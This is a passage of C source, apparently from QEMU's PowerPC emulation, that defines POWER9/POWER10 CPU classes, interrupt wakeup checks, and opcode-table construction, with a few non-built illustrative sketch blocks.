PPC2_ATOMIC_ISA206 | PPC2_FP_CVT_ISA206 | PPC2_FP_TST_ISA206 | PPC2_BCTAR_ISA207 | PPC2_LSQ_ISA207 | PPC2_ALTIVEC_207 | PPC2_ISA205 | PPC2_ISA207S | PPC2_FP_CVT_S64 | PPC2_TM | PPC2_ISA300 | PPC2_PRCNTL; pcc->msr_mask = (1ull << MSR_SF) | (1ull << MSR_HV) | (1ull << MSR_TM) | (1ull << MSR_VR) | (1ull << MSR_VSX) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->lpcr_mask = LPCR_VPM1 | LPCR_ISL | LPCR_KBV | LPCR_DPFD | (LPCR_PECE_U_MASK & LPCR_HVEE) | LPCR_ILE | LPCR_AIL | LPCR_UPRT | LPCR_EVIRT | LPCR_ONL | LPCR_HR | LPCR_LD | (LPCR_PECE_L_MASK & (LPCR_PDEE | LPCR_HDEE | LPCR_EEE | LPCR_DEE | LPCR_OEE)) | LPCR_MER | LPCR_GTSE | LPCR_TC | LPCR_HEIC | LPCR_LPES0 | LPCR_HVICE | LPCR_HDICE; pcc->lpcr_pm = LPCR_PDEE | LPCR_HDEE | LPCR_EEE | LPCR_DEE | LPCR_OEE; pcc->mmu_model = POWERPC_MMU_3_00; pcc->handle_mmu_fault = ppc64_v3_handle_mmu_fault; /* segment page size remain the same */ pcc->hash64_opts = &ppc_hash64_opts_POWER7; pcc->radix_page_info = &POWER9_radix_page_info; pcc->lrg_decr_bits = 56; 
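#if 0
/*
 * Illustrative sketch (not built): the stop-state wakeup checks in
 * cpu_has_work_POWER9() above amount to pairing each pending-interrupt
 * bit with the LPCR power-management exit-enable bit that gates it
 * (the external-exception case additionally honours LPCR_HEIC); most
 * of these gates are also collected in pcc->lpcr_pm above.
 */
static const struct {
    uint32_t pending_mask; /* bit(s) in env->pending_interrupts */
    uint64_t lpcr_gate;    /* enabling bit in env->spr[SPR_LPCR] */
} power9_wakeup_sketch[] = {
    { 1u << PPC_INTERRUPT_EXT,                           LPCR_EEE  },
    { 1u << PPC_INTERRUPT_DECR,                          LPCR_DEE  },
    { 1u << PPC_INTERRUPT_MCK | 1u << PPC_INTERRUPT_HMI, LPCR_OEE  },
    { 1u << PPC_INTERRUPT_DOORBELL,                      LPCR_PDEE },
    { 1u << PPC_INTERRUPT_HDOORBELL,                     LPCR_HDEE },
    { 1u << PPC_INTERRUPT_HVIRT,                         LPCR_HVEE },
};
#endif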
pcc->n_host_threads = 4; pcc->excp_model = POWERPC_EXCP_POWER9; pcc->bus_model = PPC_FLAGS_INPUT_POWER9; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK | POWERPC_FLAG_CFAR | POWERPC_FLAG_VSX | POWERPC_FLAG_TM; pcc->l1_dcache_size = 0x8000; pcc->l1_icache_size = 0x8000; pcc->interrupts_big_endian = ppc_cpu_interrupts_big_endian_lpcr; } /* * Radix pg sizes and AP encodings for dt node ibm,processor-radix-AP-encodings * Encoded as array of int_32s in the form: * 0bxxxyyyyyyyyyyyyyyyyyyyyyyyyyyyyy * x -> AP encoding * y -> radix mode supported page size (encoded as a shift) */ static struct ppc_radix_page_info POWER10_radix_page_info = { .count = 4, .entries = { 0x0000000c, /* 4K - enc: 0x0 */ 0xa0000010, /* 64K - enc: 0x5 */ 0x20000015, /* 2M - enc: 0x1 */ 0x4000001e /* 1G - enc: 0x2 */ } }; static void init_proc_POWER10(CPUPPCState *env) { /* Common Registers */ init_proc_book3s_common(env); gen_spr_book3s_207_dbg(env); /* POWER8 Specific Registers */ gen_spr_book3s_ids(env); gen_spr_amr(env); gen_spr_iamr(env); gen_spr_book3s_purr(env); gen_spr_power5p_common(env); gen_spr_power5p_lpar(env); gen_spr_power5p_ear(env); gen_spr_power6_common(env); gen_spr_power6_dbg(env); gen_spr_power8_tce_address_control(env); gen_spr_power8_ids(env); gen_spr_power8_ebb(env); gen_spr_power8_fscr(env); gen_spr_power8_pmu_sup(env); gen_spr_power8_pmu_user(env); gen_spr_power8_tm(env); gen_spr_power8_pspb(env); gen_spr_vtb(env); gen_spr_power8_ic(env); gen_spr_power8_book4(env); gen_spr_power8_rpr(env); gen_spr_power9_mmu(env); /* POWER9 Specific registers */ spr_register_kvm(env, SPR_TIDR, "TIDR", NULL, NULL, spr_read_generic, spr_write_generic, KVM_REG_PPC_TIDR, 0); /* FIXME: Filter fields properly based on privilege level */ spr_register_kvm_hv(env, SPR_PSSCR, "PSSCR", NULL, NULL, NULL, NULL, spr_read_generic, spr_write_generic, KVM_REG_PPC_PSSCR, 0); /* env variables */ env->dcache_line_size = 128; env->icache_line_size = 128; /* Allocate hardware IRQ controller */ init_excp_POWER10(env); ppcPOWER9_irq_init(env_archcpu(env)); } static bool ppc_pvr_match_power10(PowerPCCPUClass *pcc, uint32_t pvr) { if ((pvr & CPU_POWERPC_POWER_SERVER_MASK) == CPU_POWERPC_POWER10_BASE) { return true; } return false; } static bool cpu_has_work_POWER10(CPUState *cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; if (cs->halted) { uint64_t psscr = env->spr[SPR_PSSCR]; if (!(cs->interrupt_request & CPU_INTERRUPT_HARD)) { return false; } /* If EC is clear, just return true on any pending interrupt */ if (!(psscr & PSSCR_EC)) { return true; } /* External Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_EXT)) && (env->spr[SPR_LPCR] & LPCR_EEE)) { bool heic = !!(env->spr[SPR_LPCR] & LPCR_HEIC); if (heic == 0 || !msr_hv || msr_pr) { return true; } } /* Decrementer Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_DECR)) && (env->spr[SPR_LPCR] & LPCR_DEE)) { return true; } /* Machine Check or Hypervisor Maintenance Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_MCK | 1u << PPC_INTERRUPT_HMI)) && (env->spr[SPR_LPCR] & LPCR_OEE)) { return true; } /* Privileged Doorbell Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_DOORBELL)) && (env->spr[SPR_LPCR] & LPCR_PDEE)) { return true; } /* Hypervisor Doorbell Exception */ if ((env->pending_interrupts & (1u << PPC_INTERRUPT_HDOORBELL)) && (env->spr[SPR_LPCR] & LPCR_HDEE)) { return true; } /* Hypervisor virtualization exception */ if 
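#if 0
/*
 * Illustrative sketch (not built): ppc_pvr_match_power10() above keeps
 * only the family bits of the PVR, so every POWER10 revision selects
 * the same CPU class. The 0x00801234 value here is a made-up revision
 * used purely for illustration.
 */
static bool pvr_family_match_sketch(void)
{
    uint32_t pvr = 0x00801234; /* hypothetical POWER10-family PVR */
    return (pvr & CPU_POWERPC_POWER_SERVER_MASK) == CPU_POWERPC_POWER10_BASE;
}
#endif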
((env->pending_interrupts & (1u << PPC_INTERRUPT_HVIRT)) && (env->spr[SPR_LPCR] & LPCR_HVEE)) { return true; } if (env->pending_interrupts & (1u << PPC_INTERRUPT_RESET)) { return true; } return false; } else { return msr_ee && (cs->interrupt_request & CPU_INTERRUPT_HARD); } } POWERPC_FAMILY(POWER10)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(oc); // dc->fw_name = "PowerPC,POWER10"; // dc->desc = "POWER10"; pcc->pvr_match = ppc_pvr_match_power10; pcc->pcr_mask = PCR_COMPAT_2_05 | PCR_COMPAT_2_06 | PCR_COMPAT_2_07 | PCR_COMPAT_3_00; pcc->pcr_supported = PCR_COMPAT_3_10 | PCR_COMPAT_3_00 | PCR_COMPAT_2_07 | PCR_COMPAT_2_06 | PCR_COMPAT_2_05; pcc->init_proc = init_proc_POWER10; pcc->check_pow = check_pow_nocheck; cc->has_work = cpu_has_work_POWER10; pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_FRSQRTES | PPC_FLOAT_STFIWX | PPC_FLOAT_EXT | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBSYNC | PPC_64B | PPC_64H | PPC_64BX | PPC_ALTIVEC | PPC_SEGMENT_64B | PPC_SLBI | PPC_POPCNTB | PPC_POPCNTWD | PPC_CILDST; pcc->insns_flags2 = PPC2_VSX | PPC2_VSX207 | PPC2_DFP | PPC2_DBRX | PPC2_PERM_ISA206 | PPC2_DIVE_ISA206 | PPC2_ATOMIC_ISA206 | PPC2_FP_CVT_ISA206 | PPC2_FP_TST_ISA206 | PPC2_BCTAR_ISA207 | PPC2_LSQ_ISA207 | PPC2_ALTIVEC_207 | PPC2_ISA205 | PPC2_ISA207S | PPC2_FP_CVT_S64 | PPC2_TM | PPC2_ISA300 | PPC2_PRCNTL; pcc->msr_mask = (1ull << MSR_SF) | (1ull << MSR_HV) | (1ull << MSR_TM) | (1ull << MSR_VR) | (1ull << MSR_VSX) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->lpcr_mask = LPCR_VPM1 | LPCR_ISL | LPCR_KBV | LPCR_DPFD | (LPCR_PECE_U_MASK & LPCR_HVEE) | LPCR_ILE | LPCR_AIL | LPCR_UPRT | LPCR_EVIRT | LPCR_ONL | LPCR_HR | LPCR_LD | (LPCR_PECE_L_MASK & (LPCR_PDEE | LPCR_HDEE | LPCR_EEE | LPCR_DEE | LPCR_OEE)) | LPCR_MER | LPCR_GTSE | LPCR_TC | LPCR_HEIC | LPCR_LPES0 | LPCR_HVICE | LPCR_HDICE; pcc->lpcr_pm = LPCR_PDEE | LPCR_HDEE | LPCR_EEE | LPCR_DEE | LPCR_OEE; pcc->mmu_model = POWERPC_MMU_3_00; pcc->handle_mmu_fault = ppc64_v3_handle_mmu_fault; /* segment page size remain the same */ pcc->hash64_opts = &ppc_hash64_opts_POWER7; pcc->radix_page_info = &POWER10_radix_page_info; pcc->lrg_decr_bits = 56; pcc->excp_model = POWERPC_EXCP_POWER9; pcc->bus_model = PPC_FLAGS_INPUT_POWER9; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK | POWERPC_FLAG_CFAR | POWERPC_FLAG_VSX | POWERPC_FLAG_TM; pcc->l1_dcache_size = 0x8000; pcc->l1_icache_size = 0x8000; pcc->interrupts_big_endian = ppc_cpu_interrupts_big_endian_lpcr; } #if 0 void cpu_ppc_set_vhyp(PowerPCCPU *cpu, PPCVirtualHypervisor *vhyp) { CPUPPCState *env = &cpu->env; cpu->vhyp = vhyp; /* * With a virtual hypervisor mode we never allow the CPU to go * hypervisor mode itself */ env->msr_mask &= ~MSR_HVB; } #endif #endif /* defined(TARGET_PPC64) */ /*****************************************************************************/ /* Generic CPU instantiation routine */ static void init_ppc_proc(PowerPCCPU *cpu) { PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); CPUPPCState *env = &cpu->env; int i; env->irq_inputs = NULL; /* Set all exception vectors to an invalid address */ for (i 
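#if 0
/*
 * Illustrative sketch (not built, simplified): the msr_mask assembled
 * above acts as a write filter on the MSR -- bits present in the mask
 * take the incoming value, everything else keeps its old state. The
 * real update path (hreg_store_msr) layers more side effects on top.
 */
static uint64_t msr_write_filter_sketch(uint64_t old_msr, uint64_t new_msr,
                                        uint64_t msr_mask)
{
    return (old_msr & ~msr_mask) | (new_msr & msr_mask);
}
#endif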
= 0; i < POWERPC_EXCP_NB; i++) { #ifdef _MSC_VER env->excp_vectors[i] = (target_ulong)(0ULL - 1ULL); #else env->excp_vectors[i] = (target_ulong)(-1ULL); #endif } env->ivor_mask = 0x00000000; env->ivpr_mask = 0x00000000; /* Default MMU definitions */ env->nb_BATs = 0; env->nb_tlb = 0; env->nb_ways = 0; env->tlb_type = TLB_NONE; /* Register SPR common to all PowerPC implementations */ gen_spr_generic(env); spr_register(env, SPR_PVR, "PVR", /* Linux permits userspace to read PVR */ SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, pcc->pvr); /* Register SVR if it's defined to anything else than POWERPC_SVR_NONE */ if (pcc->svr != POWERPC_SVR_NONE) { if (pcc->svr & POWERPC_SVR_E500) { spr_register(env, SPR_E500_SVR, "SVR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, pcc->svr & ~POWERPC_SVR_E500); } else { spr_register(env, SPR_SVR, "SVR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, pcc->svr); } } /* PowerPC implementation specific initialisations (SPRs, timers, ...) */ (*pcc->init_proc)(env); #if 0 ppc_gdb_gen_spr_xml(cpu); #endif /* MSR bits & flags consistency checks */ if (env->msr_mask & (1 << 25)) { switch (env->flags & (POWERPC_FLAG_SPE | POWERPC_FLAG_VRE)) { case POWERPC_FLAG_SPE: case POWERPC_FLAG_VRE: break; default: fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should define POWERPC_FLAG_SPE or POWERPC_FLAG_VRE\n"); exit(1); } } else if (env->flags & (POWERPC_FLAG_SPE | POWERPC_FLAG_VRE)) { fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should not define POWERPC_FLAG_SPE nor POWERPC_FLAG_VRE\n"); exit(1); } if (env->msr_mask & (1 << 17)) { switch (env->flags & (POWERPC_FLAG_TGPR | POWERPC_FLAG_CE)) { case POWERPC_FLAG_TGPR: case POWERPC_FLAG_CE: break; default: fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should define POWERPC_FLAG_TGPR or POWERPC_FLAG_CE\n"); exit(1); } } else if (env->flags & (POWERPC_FLAG_TGPR | POWERPC_FLAG_CE)) { fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should not define POWERPC_FLAG_TGPR nor POWERPC_FLAG_CE\n"); exit(1); } if (env->msr_mask & (1 << 10)) { switch (env->flags & (POWERPC_FLAG_SE | POWERPC_FLAG_DWE | POWERPC_FLAG_UBLE)) { case POWERPC_FLAG_SE: case POWERPC_FLAG_DWE: case POWERPC_FLAG_UBLE: break; default: fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should define POWERPC_FLAG_SE or POWERPC_FLAG_DWE or " "POWERPC_FLAG_UBLE\n"); exit(1); } } else if (env->flags & (POWERPC_FLAG_SE | POWERPC_FLAG_DWE | POWERPC_FLAG_UBLE)) { fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should not define POWERPC_FLAG_SE nor POWERPC_FLAG_DWE nor " "POWERPC_FLAG_UBLE\n"); exit(1); } if (env->msr_mask & (1 << 9)) { switch (env->flags & (POWERPC_FLAG_BE | POWERPC_FLAG_DE)) { case POWERPC_FLAG_BE: case POWERPC_FLAG_DE: break; default: fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should define POWERPC_FLAG_BE or POWERPC_FLAG_DE\n"); exit(1); } } else if (env->flags & (POWERPC_FLAG_BE | POWERPC_FLAG_DE)) { fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should not define POWERPC_FLAG_BE nor POWERPC_FLAG_DE\n"); exit(1); } if (env->msr_mask & (1 << 2)) { switch (env->flags & (POWERPC_FLAG_PX | POWERPC_FLAG_PMM)) { case POWERPC_FLAG_PX: case POWERPC_FLAG_PMM: break; default: fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should define POWERPC_FLAG_PX or POWERPC_FLAG_PMM\n"); exit(1); } } else if (env->flags & (POWERPC_FLAG_PX | POWERPC_FLAG_PMM)) { fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should not define 
POWERPC_FLAG_PX nor POWERPC_FLAG_PMM\n"); exit(1); } if ((env->flags & (POWERPC_FLAG_RTC_CLK | POWERPC_FLAG_BUS_CLK)) == 0) { fprintf(stderr, "PowerPC flags inconsistency\n" "Should define the time-base and decrementer clock source\n"); exit(1); } /* Allocate TLBs buffer when needed */ if (env->nb_tlb != 0) { int nb_tlb = env->nb_tlb; if (env->id_tlbs != 0) { nb_tlb *= 2; } switch (env->tlb_type) { case TLB_6XX: env->tlb.tlb6 = g_new0(ppc6xx_tlb_t, nb_tlb); break; case TLB_EMB: env->tlb.tlbe = g_new0(ppcemb_tlb_t, nb_tlb); break; case TLB_MAS: env->tlb.tlbm = g_new0(ppcmas_tlb_t, nb_tlb); break; } /* Pre-compute some useful values */ env->tlb_per_way = env->nb_tlb / env->nb_ways; } #if 0 if (env->irq_inputs == NULL) { warn_report("no internal IRQ controller registered." " Attempt QEMU to crash very soon !"); } if (env->check_pow == NULL) { warn_report("no power management check handler registered." " Attempt QEMU to crash very soon !"); } #endif } #if defined(PPC_DUMP_CPU) static void dump_ppc_sprs(CPUPPCState *env) { ppc_spr_t *spr; uint32_t sr, sw; uint32_t ur, uw; int i, j, n; printf("Special purpose registers:\n"); for (i = 0; i < 32; i++) { for (j = 0; j < 32; j++) { n = (i << 5) | j; spr = &env->spr_cb[n]; uw = spr->uea_write != NULL && spr->uea_write != SPR_NOACCESS; ur = spr->uea_read != NULL && spr->uea_read != SPR_NOACCESS; sw = spr->oea_write != NULL && spr->oea_write != SPR_NOACCESS; sr = spr->oea_read != NULL && spr->oea_read != SPR_NOACCESS; if (sw || sr || uw || ur) { printf("SPR: %4d (%03x) %-8s s%c%c u%c%c\n", (i << 5) | j, (i << 5) | j, spr->name, sw ? 'w' : '-', sr ? 'r' : '-', uw ? 'w' : '-', ur ? 'r' : '-'); } } } fflush(stdout); fflush(stderr); } #endif /*****************************************************************************/ /* Opcode types */ enum { PPC_DIRECT = 0, /* Opcode routine */ PPC_INDIRECT = 1, /* Indirect opcode table */ }; #define PPC_OPCODE_MASK 0x3 static inline int is_indirect_opcode(void *handler) { return ((uintptr_t)handler & PPC_OPCODE_MASK) == PPC_INDIRECT; } static inline opc_handler_t **ind_table(void *handler) { return (opc_handler_t **)((uintptr_t)handler & ~PPC_OPCODE_MASK); } /* Instruction table creation */ /* Opcodes tables creation */ static void fill_new_table(opc_handler_t **table, int len) { int i; for (i = 0; i < len; i++) { table[i] = &invalid_handler; } } static int create_new_table(opc_handler_t **table, unsigned char idx) { opc_handler_t **tmp; tmp = g_new(opc_handler_t *, PPC_CPU_INDIRECT_OPCODES_LEN); fill_new_table(tmp, PPC_CPU_INDIRECT_OPCODES_LEN); table[idx] = (opc_handler_t *)((uintptr_t)tmp | PPC_INDIRECT); return 0; } static int insert_in_table(opc_handler_t **table, unsigned char idx, opc_handler_t *handler) { if (table[idx] != &invalid_handler) { return -1; } table[idx] = handler; return 0; } static int register_direct_insn(opc_handler_t **ppc_opcodes, unsigned char idx, opc_handler_t *handler) { if (insert_in_table(ppc_opcodes, idx, handler) < 0) { printf("*** ERROR: opcode %02x already assigned in main " "opcode table\n", idx); #if defined(DO_PPC_STATISTICS) || defined(PPC_DUMP_CPU) printf(" Registered handler '%s' - new handler '%s'\n", ppc_opcodes[idx]->oname, handler->oname); #endif return -1; } return 0; } static int register_ind_in_table(opc_handler_t **table, unsigned char idx1, unsigned char idx2, opc_handler_t *handler) { if (table[idx1] == &invalid_handler) { if (create_new_table(table, idx1) < 0) { printf("*** ERROR: unable to create indirect table " "idx=%02x\n", idx1); return -1; } } else { if 
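#if 0
/*
 * Illustrative sketch (not built): the opcode tables store either a
 * direct handler or a pointer to a sub-table, told apart by a tag in
 * the low pointer bits (free because the tables are at least 4-byte
 * aligned). Tagging and untagging mirror create_new_table() and
 * ind_table() above.
 */
static void opcode_tag_sketch(opc_handler_t **sub_table,
                              opc_handler_t **slot)
{
    /* store: tag the sub-table pointer as indirect */
    *slot = (opc_handler_t *)((uintptr_t)sub_table | PPC_INDIRECT);
    /* load: strip the tag to recover the sub-table */
    opc_handler_t **recovered =
        (opc_handler_t **)((uintptr_t)*slot & ~PPC_OPCODE_MASK);
    (void)recovered;
}
#endif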
(!is_indirect_opcode(table[idx1])) { printf("*** ERROR: idx %02x already assigned to a direct " "opcode\n", idx1); #if defined(DO_PPC_STATISTICS) || defined(PPC_DUMP_CPU) printf(" Registered handler '%s' - new handler '%s'\n", ind_table(table[idx1])[idx2]->oname, handler->oname); #endif return -1; } } if (handler != NULL && insert_in_table(ind_table(table[idx1]), idx2, handler) < 0) { printf("*** ERROR: opcode %02x already assigned in " "opcode table %02x\n", idx2, idx1); #if defined(DO_PPC_STATISTICS) || defined(PPC_DUMP_CPU) printf(" Registered handler '%s' - new handler '%s'\n", ind_table(table[idx1])[idx2]->oname, handler->oname); #endif return -1; } return 0; } static int register_ind_insn(opc_handler_t **ppc_opcodes, unsigned char idx1, unsigned char idx2, opc_handler_t *handler) { return register_ind_in_table(ppc_opcodes, idx1, idx2, handler); } static int register_dblind_insn(opc_handler_t **ppc_opcodes, unsigned char idx1, unsigned char idx2, unsigned char idx3, opc_handler_t *handler) { if (register_ind_in_table(ppc_opcodes, idx1, idx2, NULL) < 0) { printf("*** ERROR: unable to join indirect table idx " "[%02x-%02x]\n", idx1, idx2); return -1; } if (register_ind_in_table(ind_table(ppc_opcodes[idx1]), idx2, idx3, handler) < 0) { printf("*** ERROR: unable to insert opcode " "[%02x-%02x-%02x]\n", idx1, idx2, idx3); return -1; } return 0; } static int register_trplind_insn(opc_handler_t **ppc_opcodes, unsigned char idx1, unsigned char idx2, unsigned char idx3, unsigned char idx4, opc_handler_t *handler) { opc_handler_t **table; if (register_ind_in_table(ppc_opcodes, idx1, idx2, NULL) < 0) { printf("*** ERROR: unable to join indirect table idx " "[%02x-%02x]\n", idx1, idx2); return -1; } table = ind_table(ppc_opcodes[idx1]); if (register_ind_in_table(table, idx2, idx3, NULL) < 0) { printf("*** ERROR: unable to join 2nd-level indirect table idx " "[%02x-%02x-%02x]\n", idx1, idx2, idx3); return -1; } table = ind_table(table[idx2]); if (register_ind_in_table(table, idx3, idx4, handler) < 0) { printf("*** ERROR: unable to insert opcode " "[%02x-%02x-%02x-%02x]\n", idx1, idx2, idx3, idx4); return -1; } return 0; } static int register_insn(opc_handler_t **ppc_opcodes, opcode_t *insn) { if (insn->opc2 != 0xFF) { if (insn->opc3 != 0xFF) { if (insn->opc4 != 0xFF) { if (register_trplind_insn(ppc_opcodes, insn->opc1, insn->opc2, insn->opc3, insn->opc4, &insn->handler) < 0) { return -1; } } else { if (register_dblind_insn(ppc_opcodes, insn->opc1, insn->opc2, insn->opc3, &insn->handler) < 0) { return -1; } } } else { if (register_ind_insn(ppc_opcodes, insn->opc1, insn->opc2, &insn->handler) < 0) { return -1; } } } else { if (register_direct_insn(ppc_opcodes, insn->opc1, &insn->handler) < 0) { return -1; } } return 0; } static int test_opcode_table(opc_handler_t **table, int len) { int i, count, tmp; for (i = 0, count = 0; i < len; i++) { /* Consistency fixup */ if (table[i] == NULL) { table[i] = &invalid_handler; } if (table[i] != &invalid_handler) { if (is_indirect_opcode(table[i])) { tmp = test_opcode_table(ind_table(table[i]), PPC_CPU_INDIRECT_OPCODES_LEN); if (tmp == 0) { free(table[i]); table[i] = &invalid_handler; } else { count++; } } else { count++; } } } return count; } static void fix_opcode_tables(opc_handler_t **ppc_opcodes) { if (test_opcode_table(ppc_opcodes, PPC_CPU_OPCODES_LEN) == 0) { printf("*** WARNING: no opcode defined !\n"); } } /*****************************************************************************/ static int create_ppc_opcodes(PowerPCCPU *cpu) { PowerPCCPUClass *pcc 
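#if 0
/*
 * Illustrative sketch (not built): looking a handler up is the reverse
 * of register_insn() above -- walk one table per opcode level,
 * untagging whenever the current entry is an indirect table. The real
 * decoder goes one level further for opc4.
 */
static opc_handler_t *opcode_lookup_sketch(opc_handler_t **opcodes,
                                           unsigned char opc1,
                                           unsigned char opc2,
                                           unsigned char opc3)
{
    opc_handler_t *h = opcodes[opc1];
    if (is_indirect_opcode(h)) {
        h = ind_table(h)[opc2];
        if (is_indirect_opcode(h)) {
            h = ind_table(h)[opc3];
        }
    }
    return h;
}
#endif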
= POWERPC_CPU_GET_CLASS(cpu); opcode_t *opc; fill_new_table(cpu->opcodes, PPC_CPU_OPCODES_LEN); for (opc = opcodes; opc < &opcodes[ARRAY_SIZE(opcodes)]; opc++) { if (((opc->handler.type & pcc->insns_flags) != 0) || ((opc->handler.type2 & pcc->insns_flags2) != 0)) { if (register_insn(cpu->opcodes, opc) < 0) { #if 0 error_setg(errp, "ERROR initializing PowerPC instruction " "0x%02x 0x%02x 0x%02x", opc->opc1, opc->opc2, opc->opc3); #endif return 1; } } } fix_opcode_tables(cpu->opcodes); fflush(stdout); fflush(stderr); return 0; } #if defined(PPC_DUMP_CPU) static void dump_ppc_insns(CPUPPCState *env) { opc_handler_t **table, *handler; const char *p, *q; uint8_t opc1, opc2, opc3, opc4; printf("Instructions set:\n"); /* opc1 is 6 bits long */ for (opc1 = 0x00; opc1 < PPC_CPU_OPCODES_LEN; opc1++) { table = env->opcodes; handler = table[opc1]; if (is_indirect_opcode(handler)) { /* opc2 is 5 bits long */ for (opc2 = 0; opc2 < PPC_CPU_INDIRECT_OPCODES_LEN; opc2++) { table = env->opcodes; handler = env->opcodes[opc1]; table = ind_table(handler); handler = table[opc2]; if (is_indirect_opcode(handler)) { table = ind_table(handler); /* opc3 is 5 bits long */ for (opc3 = 0; opc3 < PPC_CPU_INDIRECT_OPCODES_LEN; opc3++) { handler = table[opc3]; if (is_indirect_opcode(handler)) { table = ind_table(handler); /* opc4 is 5 bits long */ for (opc4 = 0; opc4 < PPC_CPU_INDIRECT_OPCODES_LEN; opc4++) { handler = table[opc4]; if (handler->handler != &gen_invalid) { printf("INSN: %02x %02x %02x %02x -- " "(%02d %04d %02d) : %s\n", opc1, opc2, opc3, opc4, opc1, (opc3 << 5) | opc2, opc4, handler->oname); } } } else { if (handler->handler != &gen_invalid) { /* Special hack to properly dump SPE insns */ p = strchr(handler->oname, '_'); if (p == NULL) { printf("INSN: %02x %02x %02x (%02d %04d) : " "%s\n", opc1, opc2, opc3, opc1, (opc3 << 5) | opc2, handler->oname); } else { q = "speundef"; if ((p - handler->oname) != strlen(q) || (memcmp(handler->oname, q, strlen(q)) != 0)) { /* First instruction */ printf("INSN: %02x %02x %02x" "(%02d %04d) : %.*s\n", opc1, opc2 << 1, opc3, opc1, (opc3 << 6) | (opc2 << 1), (int)(p - handler->oname), handler->oname); } if (strcmp(p + 1, q) != 0) { /* Second instruction */ printf("INSN: %02x %02x %02x " "(%02d %04d) : %s\n", opc1, (opc2 << 1) | 1, opc3, opc1, (opc3 << 6) | (opc2 << 1) | 1, p + 1); } } } } } } else { if (handler->handler != &gen_invalid) { printf("INSN: %02x %02x -- (%02d %04d) : %s\n", opc1, opc2, opc1, opc2, handler->oname); } } } } else { if (handler->handler != &gen_invalid) { printf("INSN: %02x -- -- (%02d ----) : %s\n", opc1, opc1, handler->oname); } } } } #endif #if 0 static bool avr_need_swap(CPUPPCState *env) { #ifdef HOST_WORDS_BIGENDIAN return msr_le; #else return !msr_le; #endif } static int gdb_find_spr_idx(CPUPPCState *env, int n) { int i; for (i = 0; i < ARRAY_SIZE(env->spr_cb); i++) { ppc_spr_t *spr = &env->spr_cb[i]; if (spr->name && spr->gdb_id == n) { return i; } } return -1; } static int gdb_get_spr_reg(CPUPPCState *env, GByteArray *buf, int n) { int reg; int len; reg = gdb_find_spr_idx(env, n); if (reg < 0) { return 0; } len = TARGET_LONG_SIZE; gdb_get_regl(buf, env->spr[reg]); ppc_maybe_bswap_register(env, gdb_get_reg_ptr(buf, len), len); return len; } static int gdb_set_spr_reg(CPUPPCState *env, uint8_t *mem_buf, int n) { int reg; int len; reg = gdb_find_spr_idx(env, n); if (reg < 0) { return 0; } len = TARGET_LONG_SIZE; ppc_maybe_bswap_register(env, mem_buf, len); env->spr[reg] = ldn_p(mem_buf, len); return len; } static int 
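#if 0
/*
 * Illustrative sketch (not built): the gdb register helpers around
 * here byte-swap a register image exactly when host and guest byte
 * orders disagree, which is all avr_need_swap() above computes.
 */
static bool endian_mismatch_sketch(bool host_is_big_endian,
                                   bool guest_is_big_endian)
{
    return host_is_big_endian != guest_is_big_endian;
}
#endif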
